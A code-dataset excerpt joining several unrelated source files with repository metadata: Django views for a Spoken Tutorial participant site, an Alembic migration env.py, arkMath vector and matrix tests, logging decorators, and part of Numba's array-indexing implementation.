mdluser.auth = 'manual'
mdluser.institution = form.cleaned_data['college']
mdluser.gender = form.cleaned_data['gender']
mdluser.firstname = form.cleaned_data['firstname']
mdluser.lastname = form.cleaned_data['lastname']
mdluser.email = form.cleaned_data['email']
mdluser.username = form.cleaned_data['username']
mdluser.password = encript_password(form.cleaned_data['password'])
mdluser.confirmed = 1
mdluser.mnethostid = 1
mdluser.save()
messages.success(request, "User " + form.cleaned_data['firstname'] +" "+form.cleaned_data['lastname']+" Created!")
return HttpResponseRedirect('/participant/register/')
context = {}
context['form'] = form
context.update(csrf(request))
return render(request, 'mdl/templates/register.html', context)
def feedback(request, wid):
mdluserid = request.session.get('mdluserid')
mdlusername = request.session.get('mdlusername')
if not mdluserid:
return HttpResponseRedirect('/participant/login')
form = FeedbackForm()
mdluserid = request.session.get('mdluserid')
if not mdluserid:
return HttpResponseRedirect('/participant/login')
w = None
try:
w = Training.objects.select_related().get(pk=wid)
#check if feedback already exits
TrainingFeedback.objects.get(training_id = wid, mdluser_id = mdluserid)
messages.success(request, "We have already received your feedback. ")
return HttpResponseRedirect('/participant/index/?category=1')
except Exception, e:
#print e
pass
if request.method == 'POST':
form = FeedbackForm(request.POST)
if form.is_valid():
try:
form_data = form.save(commit=False)
form_data.training_id = wid
form_data.mdluser_id = mdluserid
form_data.save()
try:
wa = TrainingAttendance.objects.get(mdluser_id=mdluserid, training_id = wid)
wa.status = 2
wa.save()
except:
wa = TrainingAttendance()
wa.training_id = wid
wa.mdluser_id = mdluserid
wa.status = 1
wa.save()
messages.success(request, "Thank you for your valuable feedback.")
return HttpResponseRedirect('/participant/index/?category=1')
except Exception, e:
print e
pass
#return HttpResponseRedirect('/participant/index/')
context = {
'form' : form,
'w' : w,
'mdluserid' : mdluserid,
'mdlusername' : mdlusername,
}
context.update(csrf(request))
return render(request, 'mdl/templates/feedback.html', context)
def forget_password(request):
context = {}
form = PasswordResetForm()
if request.method == "POST":
form = PasswordResetForm(request.POST)
if form.is_valid():
password_string = ''.join(random.choice(string.ascii_uppercase + string.digits) for _ in range(8))
user = MdlUser.objects.filter(email=request.POST['email']).first()
password_encript = encript_password(password_string)
user.password = password_encript
user.save()
subject = "Spoken Tutorial Online Test password reset"
to = [user.email]
message = '''Hi {0},
Your account password at 'Spoken Tutorials Online Test Center' has been reset
and you have been issued with a new temporary password.
Your current login information is now:
username: {1}
password: {2}
Please go to this page to change your password:
{3}
In most mail programs, this should appear as a blue link
which you can just click on. If that doesn't work,
then cut and paste the address into the address
line at the top of your web browser window.
Cheers from the 'Spoken Tutorials Online Test Center' administrator,
Admin Spoken Tutorials
'''.format(user.firstname, user.username, password_string, 'http://onlinetest.spoken-tutorial.org/login/change_password.php')
# send email
email = EmailMultiAlternatives(
subject, message, '[email protected]',
to = to, bcc = [], cc = [],
headers={'Reply-To': '[email protected]', "Content-type":"text/html;charset=iso-8859-1"}
)
result = email.send(fail_silently=False)
messages.success(request, "New password sent to your email "+user.email)
return HttpResponseRedirect('/participant/login/')
context = {
'form': form
}
context.update(csrf(request))
return render(request, 'mdl/templates/password_reset.html', context)
| gpl-3.0 | 2,444,503,224,367,037,000 | 41.235955 | 210 | 0.60415 | false |
dedalusj/PaperChase | backend/alembic/env.py | 1 | 2339 | from __future__ import with_statement
import sys
from os.path import dirname, abspath
sys.path.append(dirname(dirname(abspath(__file__))))
from alembic import context
from sqlalchemy import engine_from_config, pool
from logging.config import fileConfig
from paperchase.models import *
from paperchase.core import db
from paperchase.api import create_app
app = create_app()
# this is the Alembic Config object, which provides
# access to the values within the .ini file in use.
config = context.config
# Interpret the config file for Python logging.
# This line sets up loggers basically.
fileConfig(config.config_file_name)
# add your model's MetaData object here
# for 'autogenerate' support
# from myapp import mymodel
# target_metadata = mymodel.Base.metadata
target_metadata = None
# other values from the config, defined by the needs of env.py,
# can be acquired:
# my_important_option = config.get_main_option("my_important_option")
# ... etc.
def run_migrations_offline():
"""Run migrations in 'offline' mode.
This configures the context with just a URL
and not an Engine, though an Engine is acceptable
here as well. By skipping the Engine creation
we don't even need a DBAPI to be available.
Calls to context.execute() here emit the given string to the
script output.
"""
url = config.get_main_option("sqlalchemy.url")
context.configure(url=url)
with context.begin_transaction():
context.run_migrations()
def run_migrations_online():
"""Run migrations in 'online' mode.
In this scenario we need to create an Engine
and associate a connection with the context.
"""
alembic_config = config.get_section(config.config_ini_section)
alembic_config['sqlalchemy.url'] = app.config['SQLALCHEMY_DATABASE_URI']
engine = engine_from_config(
alembic_config,
prefix='sqlalchemy.',
poolclass=pool.NullPool)
connection = engine.connect()
context.configure(
connection=connection,
target_metadata=db.metadata
)
try:
with context.begin_transaction():
context.run_migrations()
finally:
connection.close()
if context.is_offline_mode():
run_migrations_offline()
else:
run_migrations_online()
| mit | -7,431,257,112,022,274,000 | 26.197674 | 76 | 0.690894 | false |
IngenuityEngine/arkMath | test/test_helpers.py | 1 | 2374 |
# Standard modules
from expects import *
# Our modules
import arkInit
arkInit.init()
import tryout
import arkMath
from arkMath import Mat44
class test(tryout.TestSuite):
title = 'test/test_helpers.py'
def is_vector(self):
vec = arkMath.Vec(1,2,3,4)
self.assertEqual(arkMath.isVector(vec), True)
self.assertEqual(arkMath.isVector(12), False)
def ensure_vector(self):
vec = arkMath.Vec(1,2,3,4)
ensured = arkMath.ensureVector(vec)
self.assertEqual(ensured.x, vec.x)
ensured = arkMath.ensureVector(12)
self.assertEqual(ensured.x, 12)
self.assertEqual(ensured.y, 0)
ensured = arkMath.ensureVector(12, 5, 4, 9)
self.assertEqual(ensured.x, 12)
self.assertEqual(ensured.y, 5)
self.assertEqual(ensured.z, 4)
self.assertEqual(ensured.w, 9)
ensured = arkMath.ensureVector([15, 25, 7, 2])
self.assertEqual(ensured.x, 15)
self.assertEqual(ensured.y, 25)
self.assertEqual(ensured.z, 7)
self.assertEqual(ensured.w, 2)
def is_matrix(self):
matList = [1.0, 0.0, 0.0, 0.0, 0.0, 1.0, 0.0, 0.0, 0.0, 0.0, 1.0, 0.0, 0.0, 0.0, 0.0, 1.0]
matFromList = Mat44(matList)
vec1 = arkMath.Vec(1.0, 0.0, 0.0, 0.0)
vec2 = arkMath.Vec(0.0, 1.0, 0.0, 0.0)
vec3 = arkMath.Vec(0.0, 0.0, 1.0, 0.0)
vec4 = arkMath.Vec(0.0, 0.0, 0.0, 1.0)
matFromVecs = Mat44(vec1, vec2, vec3, vec4)
justVec = arkMath.Vec(1, 2, 3, 4)
self.assertEqual(arkMath.isMatrix(matFromList), True)
self.assertEqual(arkMath.isMatrix(matFromVecs), True)
self.assertEqual(arkMath.isMatrix(justVec), False)
# Should work if input already a matrix, 4 vectors, or 16 matrix values
def ensure_matrix(self):
matList = [1.0, 0.0, 0.0, 0.0, 0.0, 1.0, 0.0, 0.0, 0.0, 0.0, 1.0, 0.0, 0.0, 0.0, 0.0, 1.0]
goalMat = Mat44(matList)
sixteenMat = arkMath.ensureMatrix(1.0, 0.0, 0.0, 0.0, 0.0, 1.0, 0.0, 0.0, 0.0, 0.0, 1.0, 0.0, 0.0, 0.0, 0.0, 1.0)
self.assertEqual(type(sixteenMat), type(goalMat))
vec1 = arkMath.Vec(1.0, 0.0, 0.0, 0.0)
vec2 = arkMath.Vec(0.0, 1.0, 0.0, 0.0)
vec3 = arkMath.Vec(0.0, 0.0, 1.0, 0.0)
vec4 = arkMath.Vec(0.0, 0.0, 0.0, 1.0)
vecsMat = arkMath.ensureMatrix(vec1, vec2, vec3, vec4)
self.assertEqual(type(vecsMat), type(goalMat))
# Ensure_matrix of already matrix should just return itself
selfMat = arkMath.ensureMatrix(goalMat)
self.assertEqual(type(selfMat), type(goalMat))
if __name__ == '__main__':
tryout.run(test)
| mit | 8,659,748,860,809,815,000 | 29.831169 | 115 | 0.667228 | false |
leingang/plg | plg/utils/decorators.py | 1 | 1819 | #!/usr/bin/env python
import logging
def debug_entry(f):
"""
debug the entry into a function
>>> import sys
>>> import logging
The stream configuration is just to make doctests work.
In practice, you'd probably want the default stream sys.stderr.
>>> logging.basicConfig(level=logging.DEBUG,stream=sys.stdout)
>>> @debug_entry
... def f(x):
... return x*x
...
>>> f(2)
DEBUG:f:Entering: arguments=(2,), keyword arguments={}
4
"""
def new_f(*args,**kwargs):
logger=logging.getLogger(f.__name__)
logger.debug("Entering: arguments=%s, keyword arguments=%s",args,kwargs)
return f(*args,**kwargs)
new_f.__name__ = f.__name__
return new_f
def debug_result(f):
"""
Debug the result of a function
>>> import sys
>>> import logging
>>> logging.basicConfig(level=logging.DEBUG,stream=sys.stdout)
>>> @debug_result
... def f(x):
... return x*x
...
>>> f(2)+10
DEBUG:f:Result: 4
14
Decorators can be chained (that's kind of the point!).
>>> @debug_entry
... @debug_result
... def g(x):
... return 2*x
...
>>> g(3)+17
DEBUG:g:Entering: arguments=(3,), keyword arguments={}
DEBUG:g:Result: 6
23
"""
def new_f(*args,**kwargs):
logger=logging.getLogger(f.__name__)
result=f(*args,**kwargs)
logger.debug("Result: %s",repr(result))
return result
new_f.__name__ = f.__name__
return new_f
if __name__ == "__main__":
import doctest
doctest.testmod()
# from decorators import *
# import logging
# logging.basicConfig(level=logging.DEBUG)
# @debug_result
# @debug_entry
# def f(x):
# return x*x
#
#f(2) | gpl-3.0 | 2,352,242,054,812,354,000 | 22.333333 | 80 | 0.548103 | false |
pitrou/numba | numba/targets/arrayobj.py | 1 | 109012 | """
Implementation of operations on Array objects and objects supporting
the buffer protocol.
"""
from __future__ import print_function, absolute_import, division
import math
import llvmlite.llvmpy.core as lc
from llvmlite.llvmpy.core import Constant
import numpy
from numba import types, cgutils, typing
from numba.numpy_support import as_dtype
from numba.numpy_support import version as numpy_version
from numba.targets.imputils import (builtin, builtin_attr, implement,
impl_attribute, impl_attribute_generic,
iternext_impl, impl_ret_borrowed,
impl_ret_new_ref, impl_ret_untracked)
from numba.typing import signature
from . import quicksort, slicing
def increment_index(builder, val):
"""
Increment an index *val*.
"""
one = Constant.int(val.type, 1)
# We pass the "nsw" flag in the hope that LLVM understands the index
# never changes sign. Unfortunately this doesn't always work
# (e.g. ndindex()).
return builder.add(val, one, flags=['nsw'])
def set_range_metadata(builder, load, lower_bound, upper_bound):
"""
Set the "range" metadata on a load instruction.
Note the interval is in the form [lower_bound, upper_bound).
"""
range_operands = [Constant.int(load.type, lower_bound),
Constant.int(load.type, upper_bound)]
md = builder.module.add_metadata(range_operands)
load.set_metadata("range", md)
def mark_positive(builder, load):
"""
Mark the result of a load instruction as positive (or zero).
"""
upper_bound = (1 << (load.type.width - 1)) - 1
set_range_metadata(builder, load, 0, upper_bound)
def make_array(array_type):
"""
Return the Structure representation of the given *array_type*
(an instance of types.Array).
"""
base = cgutils.create_struct_proxy(array_type)
ndim = array_type.ndim
class ArrayStruct(base):
@property
def shape(self):
"""
Override .shape to inform LLVM that its elements are all positive.
"""
builder = self._builder
if ndim == 0:
return base.__getattr__(self, "shape")
# Unfortunately, we can't use llvm.assume as its presence can
# seriously pessimize performance,
# *and* the range metadata currently isn't improving anything here,
# see https://llvm.org/bugs/show_bug.cgi?id=23848 !
ptr = self._get_ptr_by_name("shape")
dims = []
for i in range(ndim):
dimptr = cgutils.gep_inbounds(builder, ptr, 0, i)
load = builder.load(dimptr)
dims.append(load)
mark_positive(builder, load)
return cgutils.pack_array(builder, dims)
return ArrayStruct
def get_itemsize(context, array_type):
"""
Return the item size for the given array or buffer type.
"""
llty = context.get_data_type(array_type.dtype)
return context.get_abi_sizeof(llty)
def load_item(context, builder, arrayty, ptr):
"""
Load the item at the given array pointer.
"""
align = None if arrayty.aligned else 1
return context.unpack_value(builder, arrayty.dtype, ptr,
align=align)
def store_item(context, builder, arrayty, val, ptr):
"""
Store the item at the given array pointer.
"""
align = None if arrayty.aligned else 1
return context.pack_value(builder, arrayty.dtype, val, ptr, align=align)
def fix_integer_index(context, builder, idxty, idx, size):
"""
Fix the integer index' type and value for the given dimension size.
"""
if idxty.signed:
ind = context.cast(builder, idx, idxty, types.intp)
ind = slicing.fix_index(builder, ind, size)
else:
ind = context.cast(builder, idx, idxty, types.uintp)
return ind
def populate_array(array, data, shape, strides, itemsize, meminfo,
parent=None):
"""
Helper function for populating array structures.
This avoids forgetting to set fields.
*shape* and *strides* can be Python tuples or LLVM arrays.
"""
context = array._context
builder = array._builder
datamodel = array._datamodel
required_fields = set(datamodel._fields)
if meminfo is None:
meminfo = Constant.null(context.get_value_type(
datamodel.get_type('meminfo')))
intp_t = context.get_value_type(types.intp)
if isinstance(shape, (tuple, list)):
shape = cgutils.pack_array(builder, shape, intp_t)
if isinstance(strides, (tuple, list)):
strides = cgutils.pack_array(builder, strides, intp_t)
attrs = dict(shape=shape,
strides=strides,
data=data,
itemsize=itemsize,
meminfo=meminfo,)
# Set `parent` attribute
if parent is None:
attrs['parent'] = Constant.null(context.get_value_type(
datamodel.get_type('parent')))
else:
attrs['parent'] = parent
# Calc num of items from shape
nitems = context.get_constant(types.intp, 1)
unpacked_shape = cgutils.unpack_tuple(builder, shape, shape.type.count)
if unpacked_shape:
# Shape is not empty
for axlen in unpacked_shape:
nitems = builder.mul(nitems, axlen)
else:
# Shape is empty
nitems = context.get_constant(types.intp, 1)
attrs['nitems'] = nitems
# Make sure that we have all the fields
got_fields = set(attrs.keys())
if got_fields != required_fields:
raise ValueError("missing {0}".format(required_fields - got_fields))
# Set field value
for k, v in attrs.items():
setattr(array, k, v)
return array
def update_array_info(aryty, array):
"""
Update some auxiliary information in *array* after some of its fields
were changed. `itemsize` and `nitems` are updated.
"""
context = array._context
builder = array._builder
# Calc num of items from shape
nitems = context.get_constant(types.intp, 1)
unpacked_shape = cgutils.unpack_tuple(builder, array.shape, aryty.ndim)
for axlen in unpacked_shape:
nitems = builder.mul(nitems, axlen)
array.nitems = nitems
array.itemsize = context.get_constant(types.intp,
get_itemsize(context, aryty))
def make_arrayiter_cls(iterator_type):
"""
Return the Structure representation of the given *iterator_type* (an
instance of types.ArrayIteratorType).
"""
return cgutils.create_struct_proxy(iterator_type)
@builtin
@implement('getiter', types.Kind(types.Buffer))
def getiter_array(context, builder, sig, args):
[arrayty] = sig.args
[array] = args
iterobj = make_arrayiter_cls(sig.return_type)(context, builder)
zero = context.get_constant(types.intp, 0)
indexptr = cgutils.alloca_once_value(builder, zero)
iterobj.index = indexptr
iterobj.array = array
# Incref array
if context.enable_nrt:
context.nrt_incref(builder, arrayty, array)
res = iterobj._getvalue()
# Note: a decref on the iterator will dereference all internal MemInfo*
out = impl_ret_new_ref(context, builder, sig.return_type, res)
return out
def _getitem_array1d(context, builder, arrayty, array, idx, wraparound):
"""
Look up and return an element from a 1D array.
"""
ptr = cgutils.get_item_pointer(builder, arrayty, array, [idx],
wraparound=wraparound)
return load_item(context, builder, arrayty, ptr)
@builtin
@implement('iternext', types.Kind(types.ArrayIterator))
@iternext_impl
def iternext_array(context, builder, sig, args, result):
[iterty] = sig.args
[iter] = args
arrayty = iterty.array_type
if arrayty.ndim != 1:
# TODO
raise NotImplementedError("iterating over %dD array" % arrayty.ndim)
iterobj = make_arrayiter_cls(iterty)(context, builder, value=iter)
ary = make_array(arrayty)(context, builder, value=iterobj.array)
nitems, = cgutils.unpack_tuple(builder, ary.shape, count=1)
index = builder.load(iterobj.index)
is_valid = builder.icmp(lc.ICMP_SLT, index, nitems)
result.set_valid(is_valid)
with builder.if_then(is_valid):
value = _getitem_array1d(context, builder, arrayty, ary, index,
wraparound=False)
result.yield_(value)
nindex = builder.add(index, context.get_constant(types.intp, 1))
builder.store(nindex, iterobj.index)
#-------------------------------------------------------------------------------
# Basic indexing (with integers and slices only)
def basic_indexing(context, builder, aryty, ary, index_types, indices):
"""
Perform basic indexing on the given array.
A (data pointer, shapes, strides) tuple is returned describing
the corresponding view.
"""
zero = context.get_constant(types.intp, 0)
shapes = cgutils.unpack_tuple(builder, ary.shape, aryty.ndim)
strides = cgutils.unpack_tuple(builder, ary.strides, aryty.ndim)
output_indices = []
output_shapes = []
output_strides = []
ax = 0
for indexval, idxty in zip(indices, index_types):
if idxty is types.ellipsis:
# Fill up missing dimensions at the middle
n_missing = aryty.ndim - len(indices) + 1
for i in range(n_missing):
output_indices.append(zero)
output_shapes.append(shapes[ax])
output_strides.append(strides[ax])
ax += 1
continue
# Regular index value
if idxty == types.slice3_type:
slice = slicing.Slice(context, builder, value=indexval)
cgutils.guard_invalid_slice(context, builder, slice)
slicing.fix_slice(builder, slice, shapes[ax])
output_indices.append(slice.start)
sh = slicing.get_slice_length(builder, slice)
st = slicing.fix_stride(builder, slice, strides[ax])
output_shapes.append(sh)
output_strides.append(st)
elif isinstance(idxty, types.Integer):
ind = fix_integer_index(context, builder, idxty, indexval,
shapes[ax])
output_indices.append(ind)
else:
raise NotImplementedError("unexpected index type: %s" % (idxty,))
ax += 1
# Fill up missing dimensions at the end
assert ax <= aryty.ndim
while ax < aryty.ndim:
output_shapes.append(shapes[ax])
output_strides.append(strides[ax])
ax += 1
# No need to check wraparound, as negative indices were already
# fixed in the loop above.
dataptr = cgutils.get_item_pointer(builder, aryty, ary,
output_indices,
wraparound=False)
return (dataptr, output_shapes, output_strides)
def make_view(context, builder, aryty, ary, return_type,
data, shapes, strides):
"""
Build a view over the given array with the given parameters.
"""
retary = make_array(return_type)(context, builder)
populate_array(retary,
data=data,
shape=shapes,
strides=strides,
itemsize=ary.itemsize,
meminfo=ary.meminfo,
parent=ary.parent)
return retary
def _getitem_array_generic(context, builder, return_type, aryty, ary,
index_types, indices):
"""
Return the result of indexing *ary* with the given *indices*.
"""
assert isinstance(return_type, types.Buffer)
dataptr, view_shapes, view_strides = \
basic_indexing(context, builder, aryty, ary, index_types, indices)
# Build array view
retary = make_view(context, builder, aryty, ary, return_type,
dataptr, view_shapes, view_strides)
return retary._getvalue()
@builtin
@implement('getitem', types.Kind(types.Buffer), types.Kind(types.Integer))
def getitem_arraynd_intp(context, builder, sig, args):
aryty, idxty = sig.args
ary, idx = args
ary = make_array(aryty)(context, builder, ary)
dataptr, shapes, strides = \
basic_indexing(context, builder, aryty, ary, (idxty,), (idx,))
ndim = aryty.ndim
if ndim == 1:
# Return a value
assert not shapes
result = load_item(context, builder, aryty, dataptr)
elif ndim > 1:
# Return a subview over the array
out_ary = make_view(context, builder, aryty, ary, sig.return_type,
dataptr, shapes, strides)
result = out_ary._getvalue()
else:
raise NotImplementedError("1D indexing into %dD array" % aryty.ndim)
return impl_ret_borrowed(context, builder, sig.return_type, result)
@builtin
@implement('getitem', types.Kind(types.Buffer), types.slice3_type)
def getitem_array1d_slice(context, builder, sig, args):
aryty, idxty = sig.args
ary, idx = args
ary = make_array(aryty)(context, builder, value=ary)
res = _getitem_array_generic(context, builder, sig.return_type,
aryty, ary, (idxty,), (idx,))
return impl_ret_borrowed(context, builder, sig.return_type, res)
@builtin
@implement('getitem', types.Kind(types.Buffer), types.Kind(types.BaseTuple))
def getitem_array_tuple(context, builder, sig, args):
aryty, tupty = sig.args
ary, tup = args
ary = make_array(aryty)(context, builder, ary)
index_types = tupty.types
indices = cgutils.unpack_tuple(builder, tup, count=len(tupty))
if any(isinstance(ty, types.Array) for ty in index_types):
return fancy_getitem(context, builder, sig, args,
aryty, ary, index_types, indices)
dataptr, shapes, strides = \
basic_indexing(context, builder, aryty, ary, index_types, indices)
ndim = aryty.ndim
if isinstance(sig.return_type, types.Array):
# Generic array slicing
res = make_view(context, builder, aryty, ary, sig.return_type,
dataptr, shapes, strides)
res = res._getvalue()
else:
# Plain indexing (returning a scalar)
assert not shapes
res = load_item(context, builder, aryty, dataptr)
return impl_ret_borrowed(context, builder ,sig.return_type, res)
@builtin
@implement('setitem', types.Kind(types.Buffer), types.Any, types.Any)
def setitem_array(context, builder, sig, args):
"""
array[a] = scalar_or_array
array[a,..,b] = scalar_or_array
"""
aryty, idxty, valty = sig.args
ary, idx, val = args
if isinstance(idxty, types.BaseTuple):
index_types = idxty.types
indices = cgutils.unpack_tuple(builder, idx, count=len(idxty))
else:
index_types = (idxty,)
indices = (idx,)
ary = make_array(aryty)(context, builder, ary)
# First try basic indexing to see if a single array location is denoted.
try:
dataptr, shapes, strides = \
basic_indexing(context, builder, aryty, ary, index_types, indices)
except NotImplementedError:
use_fancy_indexing = True
else:
use_fancy_indexing = bool(shapes)
if use_fancy_indexing:
# Index describes a non-trivial view => use generic slice assignment
# (NOTE: this also handles scalar broadcasting)
return fancy_setslice(context, builder, sig, args,
index_types, indices)
# Store source value the given location
val = context.cast(builder, val, valty, aryty.dtype)
store_item(context, builder, aryty, val, dataptr)
@builtin
@implement(types.len_type, types.Kind(types.Buffer))
def array_len(context, builder, sig, args):
(aryty,) = sig.args
(ary,) = args
arystty = make_array(aryty)
ary = arystty(context, builder, ary)
shapeary = ary.shape
res = builder.extract_value(shapeary, 0)
return impl_ret_untracked(context, builder, sig.return_type, res)
#-------------------------------------------------------------------------------
# Advanced / fancy indexing
class Indexer(object):
"""
Generic indexer interface, for generating indices over a fancy indexed
array on a single dimension.
"""
def prepare(self):
"""
Prepare the indexer by initializing any required variables, basic
blocks...
"""
raise NotImplementedError
def get_size(self):
"""
Return this dimension's size as an integer.
"""
raise NotImplementedError
def get_shape(self):
"""
Return this dimension's shape as a tuple.
"""
raise NotImplementedError
def loop_head(self):
"""
Start indexation loop. Return a (index, count) tuple.
*index* is an integer LLVM value representing the index over this
dimension.
*count* is either an integer LLVM value representing the current
iteration count, or None if this dimension should be omitted from
the indexation result.
"""
raise NotImplementedError
def loop_tail(self):
"""
Finish indexation loop.
"""
raise NotImplementedError
class EntireIndexer(Indexer):
"""
Compute indices along an entire array dimension.
"""
def __init__(self, context, builder, aryty, ary, dim):
self.context = context
self.builder = builder
self.aryty = aryty
self.ary = ary
self.dim = dim
self.ll_intp = self.context.get_value_type(types.intp)
def prepare(self):
builder = self.builder
self.size = builder.extract_value(self.ary.shape, self.dim)
self.index = cgutils.alloca_once(builder, self.ll_intp)
self.bb_start = builder.append_basic_block()
self.bb_end = builder.append_basic_block()
def get_size(self):
return self.size
def get_shape(self):
return (self.size,)
def loop_head(self):
builder = self.builder
# Initialize loop variable
self.builder.store(Constant.int(self.ll_intp, 0), self.index)
builder.branch(self.bb_start)
builder.position_at_end(self.bb_start)
cur_index = builder.load(self.index)
with builder.if_then(builder.icmp_signed('>=', cur_index, self.size),
likely=False):
builder.branch(self.bb_end)
return cur_index, cur_index
def loop_tail(self):
builder = self.builder
next_index = builder.add(builder.load(self.index),
self.context.get_constant(types.intp, 1))
builder.store(next_index, self.index)
builder.branch(self.bb_start)
builder.position_at_end(self.bb_end)
class IntegerIndexer(Indexer):
"""
Compute indices from a single integer.
"""
def __init__(self, context, builder, idx):
self.context = context
self.builder = builder
self.idx = idx
self.ll_intp = self.context.get_value_type(types.intp)
def prepare(self):
pass
def get_size(self):
return Constant.int(self.ll_intp, 1)
def get_shape(self):
return ()
def loop_head(self):
return self.idx, None
def loop_tail(self):
pass
class IntegerArrayIndexer(Indexer):
"""
Compute indices from an array of integer indices.
"""
def __init__(self, context, builder, idxty, idxary, size):
self.context = context
self.builder = builder
self.idxty = idxty
self.idxary = idxary
self.size = size
assert idxty.ndim == 1
self.ll_intp = self.context.get_value_type(types.intp)
def prepare(self):
builder = self.builder
self.idx_size = cgutils.unpack_tuple(builder, self.idxary.shape)[0]
self.idx_index = cgutils.alloca_once(builder, self.ll_intp)
self.bb_start = builder.append_basic_block()
self.bb_end = builder.append_basic_block()
def get_size(self):
return self.idx_size
def get_shape(self):
return (self.idx_size,)
def loop_head(self):
builder = self.builder
# Initialize loop variable
self.builder.store(Constant.int(self.ll_intp, 0), self.idx_index)
builder.branch(self.bb_start)
builder.position_at_end(self.bb_start)
cur_index = builder.load(self.idx_index)
with builder.if_then(builder.icmp_signed('>=', cur_index, self.idx_size),
likely=False):
builder.branch(self.bb_end)
# Load the actual index from the array of indices
index = _getitem_array1d(self.context, builder,
self.idxty, self.idxary,
cur_index, wraparound=False)
index = fix_integer_index(self.context, builder,
self.idxty.dtype, index, self.size)
return index, cur_index
def loop_tail(self):
builder = self.builder
next_index = builder.add(builder.load(self.idx_index),
Constant.int(self.ll_intp, 1))
builder.store(next_index, self.idx_index)
builder.branch(self.bb_start)
builder.position_at_end(self.bb_end)
class BooleanArrayIndexer(Indexer):
"""
Compute indices from an array of boolean predicates.
"""
def __init__(self, context, builder, idxty, idxary):
self.context = context
self.builder = builder
self.idxty = idxty
self.idxary = idxary
assert idxty.ndim == 1
self.ll_intp = self.context.get_value_type(types.intp)
self.zero = Constant.int(self.ll_intp, 0)
self.one = Constant.int(self.ll_intp, 1)
def prepare(self):
builder = self.builder
self.size = cgutils.unpack_tuple(builder, self.idxary.shape)[0]
self.idx_index = cgutils.alloca_once(builder, self.ll_intp)
self.count = cgutils.alloca_once(builder, self.ll_intp)
self.bb_start = builder.append_basic_block()
self.bb_tail = builder.append_basic_block()
self.bb_end = builder.append_basic_block()
def get_size(self):
builder = self.builder
count = cgutils.alloca_once_value(builder, self.zero)
# Sum all true values
with cgutils.for_range(builder, self.size) as loop:
c = builder.load(count)
pred = _getitem_array1d(self.context, builder,
self.idxty, self.idxary,
loop.index, wraparound=False)
c = builder.add(c, builder.zext(pred, c.type))
builder.store(c, count)
return builder.load(count)
def get_shape(self):
return (self.get_size(),)
def loop_head(self):
builder = self.builder
# Initialize loop variable
self.builder.store(self.zero, self.idx_index)
self.builder.store(self.zero, self.count)
builder.branch(self.bb_start)
builder.position_at_end(self.bb_start)
cur_index = builder.load(self.idx_index)
cur_count = builder.load(self.count)
with builder.if_then(builder.icmp_signed('>=', cur_index, self.size),
likely=False):
builder.branch(self.bb_end)
# Load the predicate and branch if false
pred = _getitem_array1d(self.context, builder,
self.idxty, self.idxary,
cur_index, wraparound=False)
with builder.if_then(builder.not_(pred)):
builder.branch(self.bb_tail)
# Increment the count for next iteration
next_count = builder.add(cur_count, self.one)
builder.store(next_count, self.count)
return cur_index, cur_count
def loop_tail(self):
builder = self.builder
builder.branch(self.bb_tail)
builder.position_at_end(self.bb_tail)
next_index = builder.add(builder.load(self.idx_index), self.one)
builder.store(next_index, self.idx_index)
builder.branch(self.bb_start)
builder.position_at_end(self.bb_end)
class SliceIndexer(Indexer):
"""
Compute indices along a slice.
"""
def __init__(self, context, builder, aryty, ary, dim, slice):
self.context = context
self.builder = builder
self.aryty = aryty
self.ary = ary
self.dim = dim
self.slice = slice
self.ll_intp = self.context.get_value_type(types.intp)
self.zero = Constant.int(self.ll_intp, 0)
self.one = Constant.int(self.ll_intp, 1)
def prepare(self):
builder = self.builder
# Fix slice for the dimension's size
self.dim_size = builder.extract_value(self.ary.shape, self.dim)
cgutils.guard_invalid_slice(self.context, builder, self.slice)
slicing.fix_slice(builder, self.slice, self.dim_size)
self.is_step_negative = cgutils.is_neg_int(builder, self.slice.step)
# Create loop entities
self.index = cgutils.alloca_once(builder, self.ll_intp)
self.count = cgutils.alloca_once(builder, self.ll_intp)
self.bb_start = builder.append_basic_block()
self.bb_end = builder.append_basic_block()
def get_size(self):
return slicing.get_slice_length(self.builder, self.slice)
def get_shape(self):
return (self.get_size(),)
def loop_head(self):
builder = self.builder
# Initialize loop variable
self.builder.store(self.slice.start, self.index)
self.builder.store(self.zero, self.count)
builder.branch(self.bb_start)
builder.position_at_end(self.bb_start)
cur_index = builder.load(self.index)
cur_count = builder.load(self.count)
is_finished = builder.select(self.is_step_negative,
builder.icmp_signed('<=', cur_index,
self.slice.stop),
builder.icmp_signed('>=', cur_index,
self.slice.stop))
with builder.if_then(is_finished, likely=False):
builder.branch(self.bb_end)
return cur_index, cur_count
def loop_tail(self):
builder = self.builder
next_index = builder.add(builder.load(self.index), self.slice.step)
builder.store(next_index, self.index)
next_count = builder.add(builder.load(self.count), self.one)
builder.store(next_count, self.count)
builder.branch(self.bb_start)
builder.position_at_end(self.bb_end)
class FancyIndexer(object):
"""
Perform fancy indexing on the given array.
"""
def __init__(self, context, builder, aryty, ary, index_types, indices):
self.context = context
self.builder = builder
self.aryty = ary
self.shapes = cgutils.unpack_tuple(builder, ary.shape, aryty.ndim)
self.strides = cgutils.unpack_tuple(builder, ary.strides, aryty.ndim)
indexers = []
ax = 0
for indexval, idxty in zip(indices, index_types):
if idxty is types.ellipsis:
# Fill up missing dimensions at the middle
n_missing = aryty.ndim - len(indices) + 1
for i in range(n_missing):
indexer = EntireIndexer(context, builder, aryty, ary, ax)
indexers.append(indexer)
ax += 1
continue
# Regular index value
if idxty == types.slice3_type:
slice = slicing.Slice(context, builder, value=indexval)
indexer = SliceIndexer(context, builder, aryty, ary, ax, slice)
indexers.append(indexer)
elif isinstance(idxty, types.Integer):
ind = fix_integer_index(context, builder, idxty, indexval,
self.shapes[ax])
indexer = IntegerIndexer(context, builder, ind)
indexers.append(indexer)
elif isinstance(idxty, types.Array):
idxary = make_array(idxty)(context, builder, indexval)
if isinstance(idxty.dtype, types.Integer):
indexer = IntegerArrayIndexer(context, builder,
idxty, idxary,
self.shapes[ax])
elif isinstance(idxty.dtype, types.Boolean):
indexer = BooleanArrayIndexer(context, builder,
idxty, idxary)
else:
assert 0
indexers.append(indexer)
else:
raise AssertionError("unexpected index type: %s" % (idxty,))
ax += 1
# Fill up missing dimensions at the end
assert ax <= aryty.ndim, (ax, aryty.ndim)
while ax < aryty.ndim:
indexer = EntireIndexer(context, builder, aryty, ary, ax)
indexers.append(indexer)
ax += 1
assert len(indexers) == aryty.ndim, (len(indexers), aryty.ndim)
self.indexers = indexers
def prepare(self):
for i in self.indexers:
i.prepare()
def get_shape(self):
"""
Get the resulting shape as Python tuple.
"""
return sum([i.get_shape() for i in self.indexers], ())
def begin_loops(self):
indices, counts = zip(*(i.loop_head() for i in self.indexers))
